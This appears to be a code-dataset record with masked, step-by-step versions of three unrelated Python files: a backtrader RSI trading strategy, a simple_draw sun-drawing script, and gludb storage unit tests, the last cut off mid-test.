self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\n",
"step-3": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! 
Failed for {} times.'.format(self.failureNum))\n",
"step-4": "import backtrader as bt\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if self.rsi_2 < 30 and self.rsi_3 < 40:\n self.buyAlert = True\n if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and\n self.buyAlert):\n size = round(self.broker.getcash() / self.data, 3)\n self.order = self.buy(size=size)\n self.buyAlert = False\n print(round(self.broker.get_cash(), 1))\n if self.position.size != 0:\n if self.rsi_4 > 67:\n self.sellAlert1 = True\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n if self.rsi_4 > 85:\n self.sellAlert2 = True\n if self.rsi_4 < 80 and self.sellAlert2:\n self.close()\n self.successNum += 1\n self.sellAlert1 = False\n self.sellAlert2 = False\n if 0.82 * self.order.executed.price > self.datas[0\n ].close > 0.8 * self.order.executed.price:\n self.close()\n self.failureNum += 1\n print('Shit !!! 
Failed for {} times.'.format(self.failureNum))\n",
"step-5": "import backtrader as bt\r\n\r\n\r\nclass RSIStrategy(bt.Strategy):\r\n\r\n def __init__(self):\r\n self.order = None\r\n self.position.size = 0\r\n self.sellAlert1 = False\r\n self.sellAlert2 = False\r\n self.buyAlert = False\r\n self.failureNum = 0\r\n self.successNum = 0\r\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\r\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\r\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\r\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\r\n\r\n def log(self, txt, dt=None):\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n return self.log(\r\n 'BUY Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))\r\n\r\n elif order.issell():\r\n print('Succeeded for {} times.'.format(self.successNum))\r\n return self.log(\r\n 'SELL Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))\r\n\r\n def next(self):\r\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\r\n if self.position.size == 0:\r\n # The condition for activating BUY function --> By checking oversold condition.\r\n if self.rsi_2 < 30 and self.rsi_3 < 40:\r\n self.buyAlert = True\r\n # If BUY is activated and below conditions are met, then aa buy order would be placed.\r\n if self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and self.buyAlert:\r\n size = round((self.broker.getcash() / self.data), 3)\r\n self.order = self.buy(size=size)\r\n self.buyAlert = False\r\n print(round(self.broker.get_cash(), 1))\r\n # print(self.datas[0].low[0])\r\n\r\n if self.position.size != 0:\r\n # The condition for activating SELL_1 function --> Waiting for RSI to reach overbought zone.\r\n if self.rsi_4 > 67:\r\n self.sellAlert1 = True\r\n # If SELL_1 is activated and below conditions are met, then a sell 
order would be placed.\r\n if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:\r\n self.close()\r\n self.successNum += 1\r\n self.sellAlert1 = False\r\n\r\n # The condition for activating SELL_2 function --> Activated at overbought condition with RSI>85\r\n if self.rsi_4 > 85:\r\n self.sellAlert2 = True\r\n # If SELL_2 is activated and below conditions are met, then a sell order would be placed.\r\n if (self.rsi_4 < 80) and self.sellAlert2:\r\n self.close()\r\n self.successNum += 1\r\n self.sellAlert1 = False\r\n self.sellAlert2 = False\r\n\r\n # Setting Stop Loss for wrongly opened position.\r\n if 0.82 * self.order.executed.price > self.datas[0].close > 0.8 * self.order.executed.price:\r\n self.close()\r\n self.failureNum += 1\r\n print('Shit !!! Failed for {} times.'.format(self.failureNum))\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import simple_draw as sd
import random
# sd.resolution = (1400, 900)
# Prepare data for the sun function
def sun_prepare(xpoint, ypoint, radius, color, angle):
delta_list = []
radius_list = []
for delta in range(0, 360, angle):
delta_list.append(delta)
radius_list.append(random.randint(radius - 10, radius + 10))
return xpoint, ypoint, color, radius, delta_list, radius_list
# Drawing the sun
def sun(prepare_list):
xpoint = prepare_list[0]
ypoint = prepare_list[1]
color = prepare_list[2]
radius = prepare_list[3]
delta_list = prepare_list[4]
radius_list = prepare_list[5]
sd.start_drawing()
point = sd.get_point(xpoint, ypoint)
sd.circle(center_position=point, radius=radius * 3.9, color=sd.background_color, width=0)
sd.circle(center_position=point, radius=radius, color=color, width=0)
for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):
v = sd.get_vector(start_point=point, angle=delta, width=6,
length=random.randint(radius * 2, radius * 3))
v.draw(color)
sd.finish_drawing()
# sd.pause()
|
normal
|
{
"blob_id": "46babde9c26a944c9d29121b6bbf89a32f242a81",
"index": 251,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.\n background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6, length=\n random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n",
"step-4": "import simple_draw as sd\nimport random\n\n\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.\n background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6, length=\n random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n",
"step-5": "import simple_draw as sd\nimport random\n\n\n# sd.resolution = (1400, 900)\n\n# Prepare data for the sun function\ndef sun_prepare(xpoint, ypoint, radius, color, angle):\n delta_list = []\n radius_list = []\n for delta in range(0, 360, angle):\n delta_list.append(delta)\n radius_list.append(random.randint(radius - 10, radius + 10))\n\n return xpoint, ypoint, color, radius, delta_list, radius_list\n\n\n# Drawing the sun\ndef sun(prepare_list):\n xpoint = prepare_list[0]\n ypoint = prepare_list[1]\n color = prepare_list[2]\n radius = prepare_list[3]\n delta_list = prepare_list[4]\n radius_list = prepare_list[5]\n sd.start_drawing()\n point = sd.get_point(xpoint, ypoint)\n sd.circle(center_position=point, radius=radius * 3.9, color=sd.background_color, width=0)\n sd.circle(center_position=point, radius=radius, color=color, width=0)\n for j, (delta, radius) in enumerate(zip(delta_list, radius_list)):\n v = sd.get_vector(start_point=point, angle=delta, width=6,\n length=random.randint(radius * 2, radius * 3))\n v.draw(color)\n sd.finish_drawing()\n\n# sd.pause()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
<|reserved_special_token_0|>
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None)
def tearDown(self):
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None)
def tearDown(self):
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database('sqlite',
filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.
__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = 'Prefix'
def setUp(self):
gludb.config.default_database(None)
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite', filename=':memory:'))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +
SimpleStorage.__table_name__)
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
<|reserved_special_token_1|>
"""Testing data storage functionality in gludb.simple (see simple_tests.py for
testing of the rest of gludb.simple functionality)"""
import unittest
import datetime
import time
import gludb.config
from gludb.versioning import VersioningTypes
from gludb.data import orig_version
from gludb.simple import DBObject, Field
from gludb.utils import parse_now_field
from utils import compare_data_objects
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
    """Minimal DBObject fixture class exercised by every storage test below."""
    name = Field('default name')  # string field with a literal default
    descrip = Field()             # field with no explicit default
    age = Field(42)               # int field with a literal default
    extra_data = Field(dict)      # presumably Field treats a callable as a per-instance default factory - confirm in gludb.simple
# Tests for gludb.config behavior when no database mapping is configured
class MissingMapTesting(unittest.TestCase):
    """Verify gludb.config behavior when NO database mapping is configured."""

    def setUp(self):
        gludb.config.default_database(None)  # no default database

    def tearDown(self):
        # Undo any database setup so later test classes start clean
        gludb.config.clear_database_config()

    def test_failedops(self):
        """Requesting a mapping with no database configured raises ValueError."""
        # Context-manager form of assertRaises - no throwaway closure needed
        with self.assertRaises(ValueError):
            gludb.config.get_mapping(SimpleStorage)

    def test_justnomap(self):
        """With no_mapping_ok=True a missing mapping yields None, not an error."""
        mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
        self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
# Sucks, but we need to space out our timestamps
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
# Note that we DON'T check for string equality - that's because
# _last_update is updated every time the instance method to_data is
# called. See simple.md for extra details on auto fields
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
# Saved - so should have a prev version that is identical
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
# Change the object we read and then insure that the pervious version
# saved on load is correct
read_obj = all_recs[0]
